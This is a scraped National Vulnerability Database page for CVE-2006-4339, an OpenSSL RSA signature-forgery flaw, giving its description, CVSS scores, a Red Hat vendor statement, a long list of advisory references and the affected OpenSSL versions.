Mission and Overview
NVD is the U.S. government repository of standards based vulnerability management data. This data enables automation of vulnerability management, security measurement, and compliance (e.g. FISMA).
Resource Status
NVD contains:

Last updated: 9/17/2014 9:44:34 PM

CVE Publication rate: 26.13

Email List

NVD provides four mailing lists to the public. For information and subscription instructions please visit NVD Mailing Lists

Workload Index
Vulnerability Workload Index: 8.55
About Us
NVD is a product of the NIST Computer Security Division and is sponsored by the Department of Homeland Security's National Cyber Security Division. It supports the U.S. government multi-agency (OSD, DHS, NSA, DISA, and NIST) Information Security Automation Program. It is the U.S. government content repository for the Security Content Automation Protocol (SCAP).

National Cyber Awareness System

Vulnerability Summary for CVE-2006-4339

Original release date: 09/05/2006
Last revised: 08/30/2013
Source: US-CERT/NIST

Overview

OpenSSL before 0.9.7, 0.9.7 before 0.9.7k, and 0.9.8 before 0.9.8c, when using an RSA key with exponent 3, removes PKCS-1 padding before generating a hash, which allows remote attackers to forge a PKCS #1 v1.5 signature that is signed by that RSA key and prevents OpenSSL from correctly verifying X.509 and other certificates that use PKCS #1.

Impact

CVSS Severity (version 2.0):
CVSS v2 Base Score: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:P/I:N/A:N) (legend)
Impact Subscore: 2.9
Exploitability Subscore: 8.6
CVSS Version 2 Metrics:
Access Vector: Network exploitable
Access Complexity: Medium
Authentication: Not required to exploit
Impact Type: Allows unauthorized disclosure of information

Vendor Statements (disclaimer)

Official Statement from Red Hat (03/14/2007)
Vulnerable. This issue affects OpenSSL and OpenSSL compatibility packages in Red Hat Enterprise Linux 2.1, 3, and 4. Updates, along with our advisory are available at the URL below. http://rhn.redhat.com/errata/RHSA-2006-0661.html Red Hat Enterprise Linux 5 is not vulnerable to this issue as it contains a backported patch.

References to Advisories, Solutions, and Tools

By selecting these links, you will be leaving NIST webspace. We have provided these links to other web sites because they may have information that would be of interest to you. No inferences should be drawn on account of other sites being referenced, or not, from this page. There may be other web sites that are more appropriate for your purpose. NIST does not necessarily endorse the views expressed, or concur with the facts presented on these sites. Further, NIST does not endorse any commercial products that may be mentioned on these sites. Please address comments about this page to nvd@nist.gov.

External Source: FREEBSD
Name: FreeBSD-SA-06:19
External Source: VUPEN
Name: ADV-2007-2783
External Source: SECUNIA
Name: 22446
External Source: HP
Name: SSRT061181
External Source: SECTRACK
Name: 1017522
External Source: SECUNIA
Name: 23680
External Source: SECUNIA
Name: 21812
Type: Advisory
External Source: SECUNIA
Name: 22758
External Source: BID
Name: 28276
External Source: SUNALERT
Name: 102648
External Source: SECUNIA
Name: 22948
External Source: SECUNIA
Name: 21927
Type: Advisory
External Source: VUPEN
Name: ADV-2006-4205
External Source: VUPEN
Name: ADV-2006-5146
External Source: CONFIRM
Name: http://www.vmware.com/support/player2/doc/releasenotes_player2.html
External Source: SGI
Name: 20060901-01-P
External Source: SECUNIA
Name: 22036
Type: Advisory
External Source: CONFIRM
Name: http://openvpn.net/changelog.html
External Source: SUSE
Name: SUSE-SA:2007:010
External Source: GENTOO
Name: GLSA-200609-18
External Source: MLIST
Name: [ietf-openpgp] 20060827 Bleichenbacher's RSA signature forgery based on implementation error
External Source: REDHAT
Name: RHSA-2007:0062
External Source: SECUNIA
Name: 21852
Type: Advisory
External Source: SECUNIA
Name: 25284
External Source: SECUNIA
Name: 31492
External Source: CONFIRM
Name: http://www.opera.com/support/search/supsearch.dml?index=845
External Source: CONFIRM
Name: http://www14.software.ibm.com/webapp/set2/subscriptions/pqvcmjd?mode=18&ID=3117
External Source: SECUNIA
Name: 28115
External Source: SECUNIA
Name: 22325
External Source: SECUNIA
Name: 22934
External Source: SECUNIA
Name: 22044
External Source: SECUNIA
Name: 22284
External Source: OSVDB
Name: 28549
External Source: HP
Name: SSRT061275
External Source: MANDRIVA
Name: MDKSA-2006:161
External Source: HP
Name: HPSBTU02207
External Source: OPENPKG
Name: OpenPKG-SA-2006.018
External Source: CONFIRM
Name: http://www.vmware.com/support/esx25/doc/esx-254-200612-patch.html
External Source: MANDRIVA
Name: MDKSA-2006:207
External Source: SECUNIA
Name: 23794
External Source: HP
Name: HPSBUX02165
External Source: BUGTRAQ
Name: 20070110 VMware ESX server security updates
External Source: SUNALERT
Name: 201534
External Source: HP
Name: HPSBUX02219
External Source: OPENPKG
Name: OpenPKG-SA-2006.029
External Source: SUNALERT
Name: 102759
External Source: CONFIRM
Name: http://www.vmware.com/support/ws55/doc/releasenotes_ws55.html
External Source: BID
Name: 22083
External Source: SUNALERT
Name: 102744
External Source: SECUNIA
Name: 22711
External Source: HP
Name: SSRT061239
External Source: HP
Name: HPSBOV02683
External Source: HP
Name: HPSBUX02186
External Source: SECUNIA
Name: 22161
Type: Advisory
External Source: VUPEN
Name: ADV-2007-1945
External Source: SECUNIA
Name: 23455
External Source: CONFIRM
Name: https://secure-support.novell.com/KanisaPlatform/Publishing/41/3143224_f.SAL_Public.html
External Source: DEBIAN
Name: DSA-1173
Type: Patch Information
External Source: SUNALERT
Name: 201247
External Source: SECUNIA
Name: 24950
External Source: VUPEN
Name: ADV-2006-3730
External Source: VUPEN
Name: ADV-2006-4750
External Source: SLACKWARE
Name: SSA:2006-257-02
External Source: SECUNIA
Name: 22585
External Source: GENTOO
Name: GLSA-200609-05
External Source: BUGTRAQ
Name: 20060912 ERRATA: [ GLSA 200609-05 ] OpenSSL, AMD64 x86 emulation base libraries: RSA signature forgery
External Source: HP
Name: SSRT061213
External Source: SECUNIA
Name: 22513
External Source: CONFIRM
Name: http://www.vmware.com/support/server/doc/releasenotes_server.html
External Source: SECUNIA
Name: 21906
Type: Advisory
External Source: SECUNIA
Name: 21767
Type: Advisory
External Source: CISCO
Name: 20061108 Multiple Vulnerabilities in OpenSSL Library
External Source: SECUNIA
Name: 21930
Type: Advisory
External Source: SECUNIA
Name: 22260
Type: Advisory
External Source: VUPEN
Name: ADV-2010-0366
External Source: CONFIRM
Name: https://issues.rpath.com/browse/RPL-616
External Source: VUPEN
Name: ADV-2006-4417
External Source: VUPEN
Name: ADV-2007-2163
External Source: VUPEN
Name: ADV-2006-4586
External Source: SUNALERT
Name: 102656
External Source: REDHAT
Name: RHSA-2006:0661
Type: Advisory
External Source: SECUNIA
Name: 22733
External Source: OVAL
Name: oval:org.mitre.oval:def:11656
External Source: CONFIRM
Name: http://www.vmware.com/support/vi3/doc/esx-9986131-patch.html
External Source: CONFIRM
Name: http://www.vmware.com/security/advisories/VMSA-2008-0005.html
External Source: CONFIRM
Name: http://www.vmware.com/support/ace2/doc/releasenotes_ace2.html
External Source: GENTOO
Name: GLSA-200610-06
External Source: VUPEN
Name: ADV-2006-4744
External Source: CONFIRM
Name: http://www.vmware.com/support/vi3/doc/esx-3069097-patch.html
External Source: SUNALERT
Name: 102686
External Source: SECUNIA
Name: 22949
External Source: SUSE
Name: SUSE-SA:2006:055
External Source: VUPEN
Name: ADV-2006-3566
External Source: SECUNIA
Name: 21873
Type: Advisory
External Source: SECUNIA
Name: 21846
Type: Advisory
External Source: SECUNIA
Name: 22937
External Source: HP
Name: SSRT061266
External Source: SECUNIA
Name: 23915
External Source: SECUNIA
Name: 26329
External Source: HP
Name: SSRT071299
External Source: HP
Name: HPSBMA02250
External Source: SECUNIA
Name: 22799
External Source: SUSE
Name: SUSE-SR:2006:026
External Source: HP
Name: SSRT061273
External Source: MISC
Name: http://docs.info.apple.com/article.html?artnum=307177
External Source: CONFIRM
Name: http://support.attachmate.com/techdocs/2128.html
External Source: APPLE
Name: APPLE-SA-2007-12-14
External Source: SECUNIA
Name: 22226
Type: Advisory
External Source: CONFIRM
Name: http://www.vmware.com/support/player/doc/releasenotes_player.html
External Source: BUGTRAQ
Name: 20060905 rPSA-2006-0163-1 openssl openssl-scripts
External Source: SUSE
Name: SUSE-SA:2006:061
External Source: SECUNIA
Name: 21776
Type: Advisory
External Source: HP
Name: SSRT071304
External Source: VUPEN
Name: ADV-2007-0254
External Source: CONFIRM
Name: http://www.openssl.org/news/secadv_20060905.txt
Type: Advisory; Patch Information
External Source: HP
Name: SSRT090208
External Source: SECUNIA
Name: 22671
External Source: SUNALERT
Name: 200708
External Source: SLACKWARE
Name: SSA:2006-310-01
External Source: SECUNIA
Name: 24930
External Source: VUPEN
Name: ADV-2007-1815
External Source: CISCO
Name: 20061108 Multiple Vulnerabilities in OpenSSL library
External Source: CONFIRM
Name: http://www.vmware.com/support/esx2/doc/esx-202-200612-patch.html
External Source: SECUNIA
Name: 21778
Type: Advisory
External Source: VUPEN
Name: ADV-2007-0343
External Source: VUPEN
Name: ADV-2006-3899
External Source: CONFIRM
Name: http://support.attachmate.com/techdocs/2127.html
External Source: UBUNTU
Name: USN-339-1
Type: Patch Information
External Source: APPLE
Name: APPLE-SA-2006-11-28
External Source: MLIST
Name: [security-announce] 20080317 VMSA-2008-0005 Updated VMware Workstation, VMware Player, VMware Server, VMware ACE, and VMware Fusion resolve critical security issues
External Source: BEA
Name: BEA07-169.00
External Source: VUPEN
Name: ADV-2006-4366
External Source: BID
Name: 19849
Type: Patch Information
External Source: CONFIRM
Name: http://support.avaya.com/elmodocs2/security/ASA-2006-188.htm
External Source: VUPEN
Name: ADV-2006-4216
External Source: VUPEN
Name: ADV-2006-3748
External Source: SECUNIA
Name: 22545
External Source: HP
Name: HPSBUX02153
External Source: JVNDB
Name: JVNDB-2012-000079
External Source: CONFIRM
Name: http://www.bluecoat.com/support/knowledge/openSSL_RSA_Signature_forgery.html
External Source: VUPEN
Name: ADV-2006-4207
External Source: VUPEN
Name: ADV-2008-0905
External Source: VUPEN
Name: ADV-2007-4224
External Source: SECUNIA
Name: 22259
Type: Advisory
External Source: VUPEN
Name: ADV-2006-4329
External Source: VUPEN
Name: ADV-2006-3453
External Source: SECUNIA
Name: 25649
External Source: MANDRIVA
Name: MDKSA-2006:178
External Source: SECTRACK
Name: 1016791
External Source: SECUNIA
Name: 21709
Type: Advisory; Patch Information
External Source: SECUNIA
Name: 21791
Type: Advisory
External Source: SECUNIA
Name: 25399
External Source: VUPEN
Name: ADV-2006-3936
External Source: JVN
Name: JVN#51615542
External Source: SECUNIA
Name: 22938
External Source: SECUNIA
Name: 22523
External Source: SECUNIA
Name: 22936
External Source: SECUNIA
Name: 22689
External Source: SECUNIA
Name: 38567
External Source: VUPEN
Name: ADV-2007-2315
External Source: SUNALERT
Name: 1000148
External Source: MANDRIVA
Name: MDKSA-2006:177
External Source: VUPEN
Name: ADV-2006-4206
External Source: CONFIRM
Name: http://www.oracle.com/technetwork/topics/security/cpujan2007-101493.html
External Source: XF
Name: openssl-rsa-security-bypass(28755)
External Source: SECUNIA
Name: 24099
External Source: REDHAT
Name: RHSA-2007:0073
External Source: CONFIRM
Name: http://www.vmware.com/support/ws6/doc/releasenotes_ws6.html
US-CERT Vulnerability Note: CERT-VN
Name: VU#845620
External Source: BUGTRAQ
Name: 20080318 VMSA-2008-0005 Updated VMware Workstation, VMware Player, VMware Server, VMware ACE, and VMware Fusion resolve critical security issues
External Source: SECUNIA
Name: 22232
Type: Advisory
External Source: CONFIRM
Name: http://www.serv-u.com/releasenotes/
External Source: MISC
Name: http://www.matasano.com/log/469/many-rsa-signatures-may-be-forgeable-in-openssl-and-elsewhere/
External Source: VUPEN
Name: ADV-2007-1401
External Source: SECUNIA
Name: 22940
US-CERT Vulnerability Note: CERT
Name: TA06-333A
External Source: SECUNIA
Name: 22509
External Source: CONFIRM
Name: http://www.openoffice.org/security/cves/CVE-2006-4339.html
External Source: SECUNIA
Name: 22932
External Source: MLIST
Name: [bind-announce] 20061103 Internet Systems Consortium Security Advisory. [revised]
External Source: CONFIRM
Name: http://www.sybase.com/detail?id=1047991
External Source: SECUNIA
Name: 23841
External Source: VUPEN
Name: ADV-2006-3793
External Source: OPENBSD
Name: [3.9] 20060908 011: SECURITY FIX: September 8, 2006
External Source: SECUNIA
Name: 23155
External Source: SECUNIA
Name: 21823
Type: Advisory
External Source: CONFIRM
Name: http://www.vmware.com/support/esx25/doc/esx-253-200612-patch.html
External Source: SECUNIA
Name: 22939
External Source: SECUNIA
Name: 21785
Type: Advisory
External Source: SECUNIA
Name: 38568
External Source: CONFIRM
Name: http://www.vmware.com/support/esx21/doc/esx-213-200612-patch.html
External Source: SECUNIA
Name: 26893
External Source: SECUNIA
Name: 22066
External Source: REDHAT
Name: RHSA-2008:0629
External Source: CONFIRM
Name: http://docs.info.apple.com/article.html?artnum=304829
External Source: SECUNIA
Name: 21982
Type: Advisory
External Source: SUNALERT
Name: 102657
External Source: SECUNIA
Name: 21870
Type: Advisory
External Source: REDHAT
Name: RHSA-2007:0072
External Source: SUNALERT
Name: 102722
External Source: CONFIRM
Name: https://issues.rpath.com/browse/RPL-1633
External Source: DEBIAN
Name: DSA-1174
Type: Patch Information
External Source: CONFIRM
Name: http://support.attachmate.com/techdocs/2137.html
External Source: CONFIRM
Name: http://www.arkoon.fr/upload/alertes/40AK-2006-04-FR-1.1_SSL360_OPENSSL_RSA.pdf
External Source: SUNALERT
Name: 102696
External Source: VUPEN
Name: ADV-2006-4327

References to Check Content

Identifier: oval:org.mitre.oval:def:11656
Check System: http://oval.mitre.org/XMLSchema/oval-definitions-5

Vulnerable software and versions

Skip Navigation Links.
Collapse Configuration 1Configuration 1
Collapse OROR
* cpe:/a:openssl:openssl:0.9.7a
* cpe:/a:openssl:openssl:0.9.7b
* cpe:/a:openssl:openssl:0.9.7c
* cpe:/a:openssl:openssl:0.9.7d
* cpe:/a:openssl:openssl:0.9.7e
* cpe:/a:openssl:openssl:0.9.7f
* cpe:/a:openssl:openssl:0.9.7g
* cpe:/a:openssl:openssl:0.9.7h
* cpe:/a:openssl:openssl:0.9.7i
* cpe:/a:openssl:openssl:0.9.7j
* cpe:/a:openssl:openssl:0.9.8
* cpe:/a:openssl:openssl:0.9.8a
* cpe:/a:openssl:openssl:0.9.8b
* cpe:/a:openssl:openssl:0.9.7 and previous versions
* cpe:/a:openssl:openssl:0.9.6g
* cpe:/a:openssl:openssl:0.9.6f
* cpe:/a:openssl:openssl:0.9.6i
* cpe:/a:openssl:openssl:0.9.6h
* cpe:/a:openssl:openssl:0.9.6c
* cpe:/a:openssl:openssl:0.9.6e
* cpe:/a:openssl:openssl:0.9.6d
* cpe:/a:openssl:openssl:0.9.6k
* cpe:/a:openssl:openssl:0.9.6j
* cpe:/a:openssl:openssl:0.9.6l
* cpe:/a:openssl:openssl:0.9.5a:beta2
* cpe:/a:openssl:openssl:0.9.6b
* cpe:/a:openssl:openssl:0.9.6a
* cpe:/a:openssl:openssl:0.9.6a:beta1
* cpe:/a:openssl:openssl:0.9.6a:beta2
* cpe:/a:openssl:openssl:0.9.6a:beta3
* cpe:/a:openssl:openssl:0.9.6
* cpe:/a:openssl:openssl:0.9.6:beta1
* cpe:/a:openssl:openssl:0.9.6:beta2
* cpe:/a:openssl:openssl:0.9.6:beta3
* cpe:/a:openssl:openssl:0.9.5:beta2
* cpe:/a:openssl:openssl:0.9.5a
* cpe:/a:openssl:openssl:0.9.5a:beta1
* cpe:/a:openssl:openssl:0.9.3a
* cpe:/a:openssl:openssl:0.9.4
* cpe:/a:openssl:openssl:0.9.5
* cpe:/a:openssl:openssl:0.9.5:beta1
* cpe:/a:openssl:openssl:0.9.3
* cpe:/a:openssl:openssl:0.9.2b
* cpe:/a:openssl:openssl:0.9.1c
* cpe:/a:openssl:openssl:0.9.6m
* Denotes Vulnerable Software
Changes related to vulnerability configurations

Technical Details

Vulnerability Type (View All)